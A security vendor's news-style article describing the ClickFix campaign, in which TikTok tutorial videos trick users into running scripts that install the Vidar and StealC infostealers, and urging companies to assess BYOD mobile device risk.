News
July 28, 2025
One of the most downloaded apps ever. TikTok in 2025 has also become something else. An effective vector for distributing sophisticated malware directly to victims’ devices. With direct and underestimated impacts for companies too. In an article published by The Hacker News, it emerged how cybercriminals are using TikTok videos to spread Vidar and StealC, two malware families known for their ability to steal sensitive data from browsers, cryptowallets, and operating systems.
The mechanism? A mix of artificial intelligence, social engineering, and human vulnerabilities.
Some attackers are posting seemingly harmless videos on TikTok: tutorials for activating commercial software such as Office, Spotify, Windows or Adobe for free.
Nothing new, except that:
This technique has been called ClickFix. And those who trust it, open the door to an infostealer.
A low-cost, high-yield strategy, difficult to intercept with traditional filters and which represents a direct threat to all companies that manage mobile apps or BYOD environments, where the end user is often the weak link in the chain.
Imagine this scenario: an employee watches a video on TikTok during their break. They want to listen to music from Spotify for free, so they run the script and unknowingly install StealC. The malware accesses browser cookies, session tokens, and temporary files. If that employee logs into corporate portals or enterprise mobile apps on the same device, their credentials and data are compromised.
This is not a hypothetical risk. Vidar and StealC are designed to operate silently, collect data in the background, and send it to a command-line server (C2) run by criminal operators. They can exfiltrate:
Are your business mobile apps used on personal devices?
Ask for an MDM or UEM assessment
There are many reasons for the success of the ClickFix technique. First of all, the use of faces and voices generated with artificial intelligence, which make the videos professional, human, convincing. Furthermore, the tutorials are presented as free and immediate solutions to everyday problems: who wouldn’t want to activate Spotify premium without paying?
But there is another element that should not be underestimated: massive distribution through a viral algorithm. TikTok favors content that receives many interactions in the first few seconds. Hackers exploit bot accounts to artificially increase initial views, making the videos reach real users as well.
And here comes a key element: the indirect risk on corporate apps. Not because they are a direct target of ClickFix, but because they are present on compromised devices.
In 2025, a corporate mobile application may live alongside TikTok, Instagram, Spotify and personal apps, especially if BYOD (Bring Your Own Device) is permitted in the company. If the device is compromised, the data generated or exchanged with the mobile app is also at risk. OAuth tokens, session cookies, APIs: everything can be intercepted.
Mobile app security is no longer limited to code or authentication. It must extend to the context in which they exist. And that context also includes social media.
Don’t have control over the devices your apps run on?
Ask for an MDM or UEM assessment
In light of these scenarios, the most concrete advice for security and development teams is: raise the level of awareness and prevention, both on the user side and on the application side. In particular:
ClickFix shows how easy it is to compromise a device. You can make it difficult to exploit.
Contatct us for an assessment of your devices